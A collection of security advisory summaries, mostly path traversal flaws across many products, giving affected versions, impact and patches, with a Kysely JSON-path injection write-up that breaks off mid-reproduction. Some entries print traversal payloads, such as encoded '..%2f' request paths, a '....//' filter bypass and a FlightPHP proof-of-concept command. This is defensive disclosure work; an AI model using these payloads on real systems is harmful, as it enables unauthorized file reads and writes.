Path traversal in Dapr runtime versions 1.3.0-1.15.13, 1.16.0-rc.1-1.16.13, and 1.17.0-rc.1-1.17.4 allows authenticated attackers to bypass service invocation access control policies by exploiting URL encoding mismatches between ACL evaluation and request dispatch layers. Attackers can use encoded path traversal sequences (e.g., admin%2F..%2Fpublic) or reserved URL characters (%23 for fragment, %3F for query) to authorize one path while delivering a different path to the target application. The gRPC API is more dangerous as it passes method strings raw without client-side sanitization. Vendor-released patches are available in versions 1.15.14, 1.16.14, and 1.17.5 (GitHub PR #9589). No public exploit code or CISA KEV listing identified at time of analysis.
Local attackers with standard user accounts can escalate to NT AUTHORITY\SYSTEM privileges in Acer PredatorSense V3 versions 3.00.3136 through 3.00.3196. The gaming utility software exposes a misconfigured Windows Named Pipe allowing arbitrary code execution and file deletion with SYSTEM privileges. CVSS 8.5 (High) reflects severe local impact with low complexity exploitation. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis, though the technical details provided enable development of proof-of-concept code.
Remote path traversal via symlink following in zrok's WebDAV drive backend allows unauthenticated network attackers to read arbitrary files accessible to the zrok process and overwrite critical system files (such as SSH authorized_keys) outside the intended share boundary. Attack complexity is high because exploitation requires a pre-existing symlink inside the shared directory pointing outside DriveRoot-a precondition typically created through local access or misconfiguration, not by the attacker. EPSS data not provided; no CISA KEV listing indicates targeted rather than widespread exploitation. Vendor-released patch available in version 2.0.2 with commit 459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e implementing symlink boundary validation.
Kimai versions 2.32.0 through 2.55.x allow System-Admin users with invoice template upload permission to read arbitrary files from the PHP server via malicious PDF invoice templates. The vulnerability exploits mPDF's SetAssociatedFiles() function combined with unsanitized Twig template rendering to access any file readable by the PHP worker process and embed it within generated PDF invoices. No public exploit code or active exploitation has been identified; patch available in version 2.56.0.
Path traversal in electerm's IPC widget loader allows local code execution with full process privileges when an attacker achieves JavaScript execution in the renderer process. Affects all versions prior to 3.7.16. The vulnerability enables filesystem-wide arbitrary JavaScript file loading and execution through unsanitized path concatenation in runWidget function, bypassing Electron's process isolation. Vendor-released patch available in version 3.7.16. EPSS data not available; no confirmed active exploitation (not in CISA KEV).
Remote code execution in dash-uploader (Python package for Plotly Dash) versions 0.1.0 through 0.7.0a2 allows unauthenticated remote attackers to execute arbitrary code via directory traversal flaws in the HTTP request handler. The vulnerability affects temp_root path handling and POST request processing, enabling attackers to write files outside intended upload directories. Public exploit code exists (GitHub repository CVE-2026-38360), and the CVSS 9.8 critical score reflects the network-accessible, no-authentication attack vector. EPSS data not available, but the combination of RCE impact, public POC, and trivial exploitation complexity (AC:L/PR:N) makes this a high-priority remediation target for any deployment using vulnerable dash-uploader versions.
Path traversal in xiaozhi-mcphub up to version 1.0.3 allows authenticated remote attackers to access arbitrary files via manipulation of the manifest.name argument in src/controllers/dxtController.ts, with CVSS 6.3 indicating moderate impact to confidentiality, integrity, and availability. Publicly available exploit code exists, and the project maintainer has not yet responded to early disclosure notification.
Path traversal vulnerability in gyoridavid short-video-maker up to version 1.3.4 allows remote unauthenticated attackers to read arbitrary files on the server by manipulating the tmpFile parameter in REST API requests. The vulnerability exists in the REST API endpoint src/server/routers/rest.ts and has a publicly available proof-of-concept, though it is not currently confirmed as actively exploited in the wild. With a CVSS score of 5.3 (low/moderate), the vulnerability impacts confidentiality only, enabling information disclosure without requiring authentication or user interaction.
Path traversal in Microsoft APM CLI 0.8.11 and earlier allows malicious plugins to copy arbitrary readable host files into managed project directories during installation. The plugin_parser.py module fails to validate that component paths in plugin.json manifest fields (agents, skills, commands, hooks) remain within the plugin root, enabling attackers to use absolute paths or ../ traversal sequences to exfiltrate local files. Verified proof-of-concept demonstrates a malicious plugin copying external markdown files into .github/prompts/ through the auto-integration pipeline. Exploitation requires user interaction (installing a malicious plugin), but no authentication is required once the user initiates installation. CVSS 7.1 (High) reflects significant confidentiality and integrity impact in a local supply-chain attack scenario. Vendor-released patch available in apm-cli 0.8.12 per GitHub advisory GHSA-xhrw-5qxx-jpwr. No active exploitation (CISA KEV) confirmed, but publicly available exploit code exists with complete proof-of-concept including runnable scripts.
Path traversal in MiniClaw's executeSkillScript function allows authenticated remote attackers to access files outside the intended skills directory via directory traversal sequences in the skillName or scriptFile parameters. The vulnerability affects the isPathInside function in src/kernel.ts, enabling disclosure of sensitive files with CVSS 4.3 (low confidentiality impact). Publicly available exploit code exists and a vendor patch is available via commit e8bd4e17e9428260f2161378356affc5ce90d6ed.
Path traversal in Note Mark's asset upload feature allows authenticated users to inject directory traversal sequences into asset filenames via the X-Name HTTP header, which are stored unsanitized in the database. When an administrator subsequently runs data export CLI commands (typically as root in Docker deployments), the malicious filenames cause arbitrary file writes anywhere on the filesystem through Go's filepath.Join() path normalization. Attackers can achieve remote code execution as root by overwriting system binaries like /bin/bash or injecting cron jobs. Publicly available exploit code exists with video proof-of-concept demonstrating full RCE chain. Vendor-released patch available in version 0.19.4. CVSS 8.6 reflects network attack vector with low complexity but requires authenticated access and administrator interaction to trigger the export process.
Path traversal and URL injection in i18next-http-backend prior to version 3.0.5 allows remote attackers to manipulate request URLs by injecting unsanitized language (lng) and namespace (ns) parameters, potentially leading to server-side request forgery (SSRF), path-based authorization bypass, or arbitrary file reads in SSR deployments. The vulnerability affects all applications using the library with user-controlled language selection via query parameters, cookies, localStorage, or request headers-the default configuration. Vendor-released patch: version 3.0.5.
Unauthenticated information disclosure in FacturaScripts allows remote attackers to trigger phpinfo() output on fresh deployments via /?phpinfo=TRUE, exposing full PHP configuration, environment variables (including database credentials and API keys), filesystem paths, and loaded extensions. The vulnerability affects all versions with the Installer controller enabled and no patch has been released as of April 2026; publicly available proof-of-concept code exists demonstrating exploitation against PHP 8.1.34.
Remote code execution in FacturaScripts ≤2025.71 allows authenticated administrators to upload malicious ZIP files containing path traversal sequences (Zip Slip attack) through the plugin installation mechanism. The vulnerable Plugins::add() function fails to sanitize file paths within ZIP archives, enabling attackers to write arbitrary PHP files outside the plugins directory and execute system commands. A public proof-of-concept exists demonstrating full system compromise. CVSS scores this at 7.2 (High) but requires high-privilege authentication (PR:H), significantly limiting real-world attack surface to scenarios involving compromised admin credentials or malicious insiders.
BentoML's `bentoml build` command dereferences symlinks within the build context and copies their target file contents into the generated Bento artifact, allowing attackers to exfiltrate sensitive files from the build host. An attacker who controls a repository or build context can place symlinks pointing to sensitive local files (credentials, SSH keys, API tokens), and when a developer or CI system runs `bentoml build`, the referenced file contents are packaged into the Bento, which may then be exported, pushed, or containerized, spreading the leaked data. Publicly available exploit code demonstrates successful extraction of files outside the build directory. Affected versions through BentoML 1.4.38; patch released in 1.4.39.
Path traversal in Wish SSH server's SCP middleware allows authenticated attackers to read arbitrary files, write arbitrary files, and create directories outside the configured root via crafted filenames containing ../ sequences. Affects charm.land/wish/v2 versions 2.0.0 through 2.0.1 and all github.com/charmbracelet/wish v1.x versions. Vendor-released patch v2.0.1 available for v2 branch; no fix confirmed for v1 branch. CVSS 9.6 with scope change indicates potential container/host escape scenarios. No evidence of active exploitation or public POC at time of analysis.
Path traversal in Open Notebook v1.8.3's file upload functionality allows unauthenticated local users to read arbitrary files from the Docker container filesystem. The vulnerability stems from insufficient input validation, enabling attackers to bypass directory restrictions and access sensitive container files including configuration data, environment variables, and application secrets. CVSS 8.2 (High severity) reflects substantial confidentiality impact across system and container scopes, though no public exploit code or active exploitation has been identified at time of analysis.
Path traversal in Open Notebook v1.8.3's file upload allows arbitrary file creation or modification within the Docker container filesystem. Attackers with local access can write files outside intended directories, enabling container escape scenarios, configuration tampering, or privilege escalation by overwriting critical system files. No public exploit identified at time of analysis, but the vulnerability affects default configurations where file upload is accessible.
Arbitrary file deletion in WP-Optimize plugin versions ≤4.5.2 allows authenticated attackers with Author-level privileges to delete critical server files including wp-config.php, enabling remote code execution. The vulnerability exploits insufficient path validation in the unscheduled_original_file_deletion function combined with the non-protected 'original-file' meta key that Authors can manipulate via WordPress's Edit Media form or REST API. Wordfence discovered this CWE-22 path traversal flaw affecting the popular WordPress optimization plugin used on hundreds of thousands of sites.
Directory traversal in Spring Cloud Config server module allows remote unauthenticated attackers to read arbitrary files from the file system using specially crafted URLs. Affects Spring Cloud Config versions 3.1.0-3.1.13, 4.1.0-4.1.9, 4.2.0-4.2.6, 4.3.0-4.3.2, and 5.0.0-5.0.2, with patches available across all branches. The vulnerability achieves CVSS 9.1 (Critical) due to remote exploitation without authentication (AV:N/AC:L/PR:N/UI:N) and high confidentiality/integrity impact, though EPSS and KEV data are not available to confirm active exploitation status. VMware/Spring has released fixes for all affected versions.
Path traversal in FileBrowser allows unauthenticated attackers possessing a valid public share hash with delete permissions to delete arbitrary files anywhere within the share owner's storage scope. The vulnerability exists in both stable and development versions due to user-controlled path input being joined with trusted base paths before sanitization in middleware.go:111 and resource.go:274. Proof-of-concept exploit code is publicly available via GitHub advisory GHSA-fwj3-42wh-8673. Vendor-released patch available in commit 112740bdd41de7d5eb01e13ba49d406bfc463f69.
Path traversal in Rancher's UI Extensions mechanism allows authenticated administrators to write arbitrary files to the Rancher server filesystem, potentially overwriting binaries, tampering with cluster state in /var/lib/rancher/, or compromising the host node if hostPath volumes are mounted. This affects Rancher versions 2.10.11 through 2.14.0. While exploitation requires high privileges (administrator access by default) and user interaction to install a malicious extension, the changed scope (S:C) in CVSS 3.1 indicates potential container escape or cross-component impact. Vendor-released patches are available across all affected release branches (2.11.13, 2.12.9, 2.13.5, 2.14.1). No public exploit identified at time of analysis, though the attack technique (CAPEC-126 path traversal) is well-documented.
Arbitrary PDF file read vulnerability in Gotenberg versions up to 8.31.0 allows unauthenticated remote attackers to extract PDF content via path traversal in stampExpression and watermarkExpression parameters on six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown). The vulnerability exists because these routes accept user-controlled file paths without validation when stamp or watermark source is set to PDF, unlike the dedicated stamp/watermark routes which enforce file upload requirements. An attacker can read any PDF accessible to the Gotenberg process by specifying its filesystem path, gaining access to potentially sensitive documents in containerized deployments or systems with mounted directories.
Angular SSR applications fail to properly validate URL-encoded path traversal sequences in the X-Forwarded-Prefix header, allowing attackers to trigger open redirects or steer server-side HTTP requests to unintended endpoints when the application is configured to trust proxy headers and deployed behind an unsanitized proxy. Exploitation requires the upstream proxy to forward the X-Forwarded-Prefix header without stripping encoded dots (%2e%2e), and the Angular application must perform internal redirects or use relative URLs in server-side HttpClient requests. Vendor-released patches are available for all supported versions.
A proxy route rule like: ```ts routeRules: { "/api/orders/**": { proxy: { to: "http://upstream/orders/**" } } } ``` is intended to limit the proxy to URLs under `/api/orders/`. Before the patch, an attacker could bypass that scope by sending percent-encoded path traversal (`..%2f`) in the URL, causing Nitro to forward a request that the upstream resolved outside the configured scope. Example exploit: ``` GET /api/orders/..%2fadmin%2fconfig.json ``` Nitro sees `..%2f` as opaque characters at match time, the `/api/orders/**` rule matched, and the raw path was forwarded to the upstream as `/orders/..%2fadmin/config.json`. An upstream that decodes `%2F` to `/` then resolved `..` and can serve `/admin/config.json` outside the intended scope. ### Are you affected? Users may be affected if **ALL** of the following are true: 1. Their project uses Nitro's `routeRules` with a `proxy` entry (`{ proxy: { to: "..." } }`). 2. The proxy `to` value uses a `/**` wildcard suffix to forward sub-paths. 3. The **upstream** behind the proxy decodes `%2F` as `/` before routing or filesystem lookup. 4. Proxy route rules are _not_ handled natively at CDN (nitro v3 and vercel) Whether the bypass actually leaks data depends on the upstream. Modern JS frameworks keep `%2F` opaque per RFC 3986 and are safe by construction. - **Safe examples:** H3 v2, Express v5, Hono v4 - modern JS frameworks keep `%2F` opaque per RFC 3986. - **Vulnerable examples:** naive imlementations that decodes the URL, static file servers, CGI dispatchers, Python `os.path`-based routing, anything sitting behind another layer that decodes `%2F` (common in microservice meshes). ## Impact Any HTTP path reachable from the Nitro server to the upstream could be requested, regardless of the configured `/**` scope. In typical deployments (API gateway, BFF, microservice proxy) this could expose internal admin endpoints, secrets endpoints, or other services the developer believed the scope rule fenced off. ## Patched versions Upgrade to one of: - [2.13.4](https://github.com/nitrojs/nitro/releases/tag/v2.13.4) or later (https://github.com/nitrojs/nitro/pull/4223) - [3.0.260429-beta](https://github.com/nitrojs/nitro/releases/tag/v3.0.260429-beta) or later (https://github.com/nitrojs/nitro/pull/4222) The fix canonicalizes the incoming pathname before building the upstream URL and rejects requests with `400 Bad Request` if the resolved path would escape the rule's base. The bytes forwarded upstream are unchanged when the request is allowed. > Note: the fix assumes the upstream does not double-decode percent-encoding. If your upstream decodes twice (`%252F → %2F → /`), it remains your responsibility to harden it. **Single-decode is standard**. ## Credits Reported by [@mHe4am](https://github.com/mHe4am) ([@he4am on HackerOne](https://hackerone.com/he4am)) via the [Vercel Open Source](https://hackerone.com/vercel-open-source?type=team) program.
Path traversal in Mako Templates (Python library) on Windows platforms allows attackers to read arbitrary files outside configured template directories via backslash-based directory traversal sequences. Affects Mako versions ≤1.3.11 when applications accept user-controlled template names on Windows systems. Vendor-released patch available in version 1.3.12 (confirmed by GitHub commit 72e10c5). No public exploit code identified at time of analysis, though exploitation conditions are straightforward when prerequisites are met.
FlightPHP Core's default error handler exposes full exception messages, stack traces, and absolute filesystem paths in HTTP 500 responses without any debug-mode gating. All versions before 3.18.1 leak internal application structure, vendor package names, and any secrets interpolated into exception messages to unauthenticated remote attackers. This information disclosure primes follow-on attacks like LFI and path traversal by revealing server paths and configuration file locations. Vendor-released patch in version 3.18.1 introduces a flight.debug setting (default false) that suppresses verbose output in production. CVSS 7.5 reflects network-accessible information disclosure with no privileges required.
### Summary The `make:controller` CLI command calls `mkdir(..., recursive: true)` on a path built from the user-supplied controller name, **before** Nette's class-name validation runs. The class-file write is correctly rejected by Nette when the name contains `/`, but the recursive directory creation side effect is already committed - including directories located outside the project root through `../` traversal. ### Affected code `flight/commands/ControllerCommand.php` (≈ 63-66): ```php if (is_dir(dirname($controllerPath)) === false) { $io->info('Creating directory ' . dirname($controllerPath), true); mkdir(dirname($controllerPath), 0755, true); // un-normalized, runs before validation } ``` ### Proof of concept ``` $ php vendor/flightphp/runway/runway make:controller '../../../../tmp/CONTROLLER_TRAVERSAL_TEST/pwn' Creating directory .../app/controllers/../../../../tmp/CONTROLLER_TRAVERSAL_TEST Nette\InvalidArgumentException: Value '../../../../tmp/CONTROLLER_TRAVERSAL_TEST/pwnController' is not valid class name. $ ls /home/user/tmp/CONTROLLER_TRAVERSAL_TEST (directory exists - created before the exception was thrown) ``` ### Impact - **Arbitrary directory creation outside the project root**, executable by any local actor that can run the Flight CLI (developer machine, shared CI build agent, compromised dev container). - Primes log-file planting for chained LFI exploitation (e.g. creating a directory where an attacker can later drop a `.php` file to be included via a distinct template-include weakness). - On Windows, the `\` separator opens additional traversal surface. ### Patch (fixed in `3.18.1`, commit `b8dd23a`) The controller name is now normalized with `basename()` and validated against `^[A-Za-z_][A-Za-z0-9_]*$` before any `mkdir` side effect runs. ### Credit Discovered by **@Rootingg**.
Hugo static site generator versions 0.43.0 through 0.160.x allow unrestricted file system access when building sites with Node-based asset pipelines (PostCSS, Babel, TailwindCSS), enabling arbitrary code execution through these tools to read or write files outside the project directory. The vulnerability affects only users who deploy Node asset pipelines; those building trusted sites or not using these pipelines are unaffected. A vendor-released patch in v0.161.0 enforces Node's permission model with strict filesystem defaults.
Path traversal vulnerability in Magic Wormhole receive command allows authenticated attackers to write files outside the intended output directory when the specified output directory already exists, enabling arbitrary file write with low complexity via network delivery of a specially crafted transfer request.
Path traversal in GitPython versions ≤3.1.47 enables arbitrary file write and deletion outside repository boundaries when applications pass attacker-controlled reference paths to reference creation, rename, or delete operations. A fully-functional proof-of-concept demonstrates successful exploitation by crafting reference names with '../../../' sequences to escape the `.git` directory and manipulate files with the process owner's permissions. Applications exposing GitPython reference APIs to user input-particularly Git automation services, CI/CD pipelines, and multi-tenant developer platforms-are at immediate risk, as no authentication is required at the library boundary. Fixed in version 3.1.48 per GitHub advisory GHSA-7545-fcxq-7j24.
Path traversal in NanoClaw's container filesystem boundary allows compromised containers or prompt-injected agents to escape isolation and read arbitrary host files via crafted message IDs and attachment paths, with potential for recursive deletion of host directories during outbox cleanup. The vulnerability exploits insufficient validation of outbound attachment filenames and symlink resolution in the host-side message handling code. Upstream fix available (GitHub commit 7814e45) but released patched version not independently confirmed. No public exploit identified at time of analysis, though proof-of-concept test cases demonstrate both file exfiltration and destructive cleanup paths.
Local privilege escalation in ZTE PROCESS Guard Service allows authenticated local users to escalate privileges and achieve arbitrary code execution through improper access control enforcement, affecting the cloud computer client. The vulnerability requires local access and authenticated user context but operates across system boundaries, potentially compromising system integrity. No active exploitation has been confirmed at time of analysis, though the combination of privilege escalation and RCE capability makes this a moderate-priority local threat.
Path traversal vulnerability in Apache Wicket's FolderUploadsFileManager allows unauthenticated attackers to read arbitrary files or write files outside the intended upload directory by exploiting unsanitized uploadFieldId and clientFileName parameters. Affected versions 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0 are vulnerable to remote file access and modification without authentication or user interaction. Vendor-released patch available in version 10.9.0.
Oracle OCI CLI version 3.77 allows local attackers with user interaction to place imported files outside the intended directory, compromising file integrity and enabling potential code execution or data exfiltration. The vulnerability requires local access and user interaction but carries high integrity impact through arbitrary file placement. No active exploitation or public exploit code has been identified at the time of analysis.
Fluent Forms plugin for WordPress up to version 6.2.1 allows authenticated administrators to read arbitrary files readable by the web server through path traversal in the getAttachments() method of EmailNotificationActions. The vulnerability stems from insufficient validation of file-upload URLs in admin notification configurations, permitting attackers to supply traversal sequences like <upload_baseurl>/../../<target> to access sensitive files such as wp-config.php containing database credentials and authentication salts. While unauthenticated users can trigger email notifications, the exploit requires administrator-level access to configure the malicious notification attachment.
Unauthenticated path traversal in Grav CMS FormFlash component allows remote attackers to create arbitrary directories and write configuration files (index.yaml) with controlled content. Confirmed actively exploited (CISA KEV). The vulnerability affects all Grav v1.7.x installations with form-enabled pages (default in standard deployments). Attack complexity is low-requires only manipulating the __form-flash-id POST parameter with traversal sequences. Vendor-released patch available in v2.0.0-beta.2 (commit d904efc33) applies strict alphanumeric sanitization to session identifiers. EPSS exploitation probability data not available, but GitHub advisory confirms zero-day status prior to patch, with public proof-of-concept demonstrating directory creation in user/config/ paths leading to configuration injection and potential DoS via inode exhaustion.
Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.
Absolute path traversal in pyLoad download manager allows authenticated users to write files to arbitrary filesystem locations via unsanitized package folder names in the set_package_data() API function. Users with Perms.MODIFY can redirect downloads to sensitive directories (e.g., /etc, /root, system directories) bypassing intended download directory restrictions, enabling configuration overwrite or denial of service through disk exhaustion. Publicly available exploit code exists with complete proof-of-concept in the GitHub security advisory. CVSS 8.1 (High) reflects high integrity and availability impact limited by low-privilege authentication requirement.
Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces `../` with `_`, but the pattern `....//` bypasses this filter by becoming `.._` after replacement, leaving exploitable `..` sequences that the OS later resolves. CVSS 6.5 (network-accessible, low complexity, requires low-privilege authentication, high integrity impact). Publicly available proof-of-concept code demonstrates exploitation against default credentials.
efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the elfinder_checkRisk function validates target and targets for path traversal and home containment, but does not validate the dst (destination) parameter used by elfinder_paste. An attacker can copy or move files from within the home directory to any arbitrary destination by setting dst to a base64-encoded traversal path. This bypasses the protected=true security control. This vulnerability is fixed in 4.08.010.
Pulpy is a lightweight, cross-platform desktop application packager for web apps. Prior to 0.1.1, Pulpy injects a pulpy.fs JavaScript API into every packaged web application, giving it access to the host filesystem. A validateFsPath() function is supposed to sandbox this access, but its blocklist is incomplete. Any web app packaged with Pulpy can read and write arbitrary files in the user's home directory - including ~/.ssh/id_rsa, ~/.aws/credentials, and ~/Library/Keychains/. This vulnerability is fixed in 0.1.1.
Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in arbitrary file system read and write. An authenticated attacker with administrative privileges could exploit this vulnerability to read or write files outside the restricted directory. Exploitation of this issue does not require user interaction. Scope is changed.
HashiCorp Nomad and Nomad Enterprise prior to 2.0.1 are vulnerable to code execution on the client host through a path traversal attack. This vulnerability (CVE-2026-7474) is fixed in Nomad 2.0.1, 1.11.5 and 1.10.11.
Substance3D - Designer versions 15.1.0 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.
Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally.
Relative path traversal in Visual Studio Code allows an unauthorized attacker to disclose information locally.
Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (“Path Traversal”) vulnerability that could cause unauthorized access to sensitive files when user-supplied input is improperly handled during server-side file path processing.
Remote path traversal in Siemens ROS# versions prior to V2.2.2 enables unauthenticated attackers to read arbitrary files from affected systems due to insufficient input sanitization. The vulnerability affects the ROS# library, a C# .NET implementation for Robot Operating System communication, with CVSS 9.3 critical severity. No active exploitation or public exploit code has been identified at time of analysis, though the network-accessible attack vector and lack of authentication requirements present significant risk for robotics systems using this library.
Privilege escalation in Axis OS via path traversal in ACAP configuration files allows high-privileged local attackers to achieve code execution with elevated permissions. The vulnerability requires the device to be configured for unsigned ACAP application installation and the attacker to socially engineer a user into installing a malicious ACAP application. CVSS 6.7 reflects high confidentiality, integrity, and availability impact, but exploitation is constrained by high-privilege requirement and user interaction. No public exploit code or active exploitation has been identified at time of analysis.
Path traversal vulnerability in Lhaz and Lhaz+ archive extraction allows local users to write files to unintended directories when the automatic folder creation feature is enabled and a crafted archive is extracted. The vulnerability requires user interaction (extracting a malicious archive) and affects only the integrity of file placement, not confidentiality or availability. CVSS score is 3.3 (low); no public exploit code or active exploitation has been identified.
Remote unauthenticated attackers can delete arbitrary ElasticSearch documents and MinIO storage files in nexent v1.7.5.2 via the unprotected DELETE /{index_name}/documents endpoint. The backend service fails to authenticate requests or validate the path_or_url parameter, enabling mass data destruction and denial of service. EPSS probability (0.12%) indicates low predicted exploitation likelihood, and no active exploitation or public exploit code has been identified at time of analysis, though the CVSS 9.1 reflects the severe impact of unauthenticated remote data deletion.
Unauthenticated remote attackers can delete arbitrary files from nexent v1.7.5.2's MinIO storage backend via an unprotected DELETE endpoint, leading to data loss and denial of service. The /storage/{object_name:path} API lacks authentication, authorization, and input validation (CWE-552). CVSS 9.1 reflects critical severity, though EPSS score of 0.08% (23rd percentile) and SSVC 'exploitation: none' indicate no observed active exploitation or public exploit code at time of analysis. SSVC marks this as 'automatable: yes' with 'technical impact: partial', suggesting straightforward exploitation once discovered but limited scope beyond data integrity/availability impacts.
jotty·page is a self-hosted app for your checklists and notes. Prior to 1.22.0, an unauthenticated path traversal vulnerability exists in /api/app-icons/[filename]. The filename route parameter is joined into a filesystem path without traversal/boundary validation, allowing file reads outside data/uploads/app-icons/. This vulnerability is fixed in 1.22.0.
Outline is a service that allows for collaborative documentation. Prior to 1.7.0, ZipHelper.extract computes the extraction path for each entry by passing a full filesystem path through trimFileAndExt, a filename helper that calls path.basename on its input when truncating. When a zip entry's nested path is long enough to push the joined filesystem path over MAX_PATH_LENGTH (4096 bytes), trimFileAndExt silently drops all directory components and returns a bare filename. fs.createWriteStream then opens the file relative to the process working directory instead of inside the extraction sandbox, and the escaped file persists after import cleanup because cleanupExtractedData only removes the temporary extraction directory. This vulnerability is fixed in 1.7.0.
Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the podcast creation endpoint at server/controllers/PodcastController.js accepts a user-controlled file path without sufficient boundary validation to ensure it remains within the intended library directory. This vulnerability is fixed in 2.32.2.
Information disclosure in macOS allows malicious applications to read unprotected user data through a path handling vulnerability. Affects macOS Sequoia (prior to 15.7.7), Sonoma (prior to 14.8.7), and Tahoe (prior to 26.5). The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears misaligned with the vendor description indicating local app-based exploitation, requiring verification. Despite high CVSS 7.5, EPSS of 0.02% (4th percentile) suggests minimal observed exploitation activity. No public exploit code or CISA KEV listing identified at time of analysis.
Local privilege escalation in Apple macOS (Sequoia, Sonoma, and Tahoe branches) allows a malicious application to gain root privileges by exploiting a path validation flaw in directory path handling. The issue, tracked as CVE-2026-28915 and reported by Apple itself, has no public exploit identified at time of analysis and a very low EPSS score (0.02%), but the total technical impact (root) makes it a meaningful endpoint hardening priority.
Authenticated users with upload permission in Audiobookshelf prior to 2.32.2 can enumerate files outside their authorized library folder through a path traversal vulnerability in the POST /api/filesystem/pathexists endpoint. The vulnerability exploits a weak String.startsWith() validation that fails to distinguish between sibling directories with shared prefixes (e.g., /audiobooks and /audiobooks-private), allowing information disclosure about file existence across library boundaries despite authentication requirements. No public exploit code or active exploitation has been identified at time of analysis.
## Summary Kysely 0.28.12 added a `sanitizeStringLiteral()` call inside `DefaultQueryCompiler.visitJSONPathLeg` (commit `0a602bf`, PR #1727) to fix CVE-2026-32763 (`GHSA-wmrf-hv6w-mr66`). The fix only doubles single quotes (`'` → `''`); it does **not** escape JSON-path metacharacters (`.`, `[`, `]`, `*`, `**`, `?`). When attacker-controlled input flows into `eb.ref(col, '->$').key(input)` or `.at(input)` - including type-safe code where the JSON column is shaped like `Record<string, T>` so `K extends string` is the inferred type - every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL `->$`/`->>$`, and SQLite. * Project: Kysely - TypeScript SQL query builder (npm `kysely`); affects MySQL, PostgreSQL `->$`/`->>$`, and SQLite dialects. * Source reviewed: `kysely-org/kysely` @ `master` (`73192e4`, version `0.28.16`). * Deployed artefact validated: `kysely@0.28.16` from npm. * Affected file(s): * `src/query-compiler/default-query-compiler.ts` (lines 1611-1639, 1821-1823) * `src/query-builder/json-path-builder.ts` (lines 93-196) * `src/dialect/mysql/mysql-query-compiler.ts` (overrides `sanitizeStringLiteral` but inherits the same behaviour for path legs - escapes `\` and `'`, nothing else) * CWE: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command, with CWE-915 / CWE-1284 (improper validation of specified quantity in input) flavours for the JSON-path sub-language. * OWASP 2021: A03:2021 - Injection. ## Vulnerable code `src/query-compiler/default-query-compiler.ts:1625-1639`: ```ts protected override visitJSONPathLeg(node: JSONPathLegNode): void { const isArrayLocation = node.type === 'ArrayLocation' this.append(isArrayLocation ? '[' : '.') // (1) this.append( typeof node.value === 'string' ? this.sanitizeStringLiteral(node.value) // (2) : String(node.value), ) if (isArrayLocation) { this.append(']') } } ``` `src/query-compiler/default-query-compiler.ts:1821-1823`: ```ts protected sanitizeStringLiteral(value: string): string { return value.replace(LIT_WRAP_REGEX, "''") // (3) } ``` with `LIT_WRAP_REGEX = /'/g`. `src/query-builder/json-path-builder.ts:151-167`: ```ts key< K extends any[] extends O ? never : O extends object ? keyof NonNullable<O> & string : never, O2 = undefined extends O ? null | NonNullable<NonNullable<O>[K]> : null extends O ? null | NonNullable<NonNullable<O>[K]> : // when the object has non-specific keys, e.g. Record<string, T>, should infer `T | null`! string extends keyof NonNullable<O> ? null | NonNullable<NonNullable<O>[K]> : NonNullable<O>[K], >(key: K): TraversedJSONPathBuilder<S, O2> { return this.#createBuilderWithPathLeg('Member', key) // (4) } ``` `src/query-builder/json-path-builder.ts:169-196`: ```ts #createBuilderWithPathLeg( legType: JSONPathLegType, value: string | number, // (5) ): TraversedJSONPathBuilder<any, any> { // ... return new TraversedJSONPathBuilder( JSONPathNode.cloneWithLeg( this.#node, JSONPathLegNode.create(legType, value), // (6) ), ) } ``` At (1) the compiler emits the path-leg separator - `.` for member access or `[` for array index. At (2) the user-supplied string is run through `sanitizeStringLiteral`, which at (3) only doubles single quotes (`'`). Dots, brackets, asterisks, double-asterisks and question marks - every reserved character of the SQL/JSON path mini-language - pass through unmodified. At (4) `.key(K)` types `K` as `keyof NonNullable<O> & string`. When the JSON column is typed as `Record<string, T>` (a common shape for free-form metadata blobs) the inferred `K` is just `string`, so attacker-controlled input is **type-safe** and does not need a `Kysely<any>` escape hatch - this finding is *broader* than `GHSA-wmrf-hv6w-mr66` (CVE-2026-32763), which only covered the `Kysely<any>` case. At (5)/(6) the runtime accepts any `string | number` regardless of `legType`, so a string sent into `.at(...)` (`'last'`/`'#-N'` per the public type signature) also reaches the same emitter and can carry `]` to break out of the bracket. The fix at `0a602bf` only addressed the single-quote → string-literal escape. The JSON-path metacharacter set was overlooked. `MysqlQueryCompiler.sanitizeStringLiteral` (`src/dialect/mysql/mysql-query-compiler.ts:47-51`) overrides the helper to also escape backslashes - but again, it does nothing for `. [ ] * ** ?`. ## Reproduction (validated locally) Environment: `kysely@0.28.16` + `better-sqlite3@12.x`, Node 22, on macOS. The PoC harness lives in `/Users/admin/joplin_research/kysely-poc/`. ### Step 1 - Compiled-SQL evidence across all three dialects 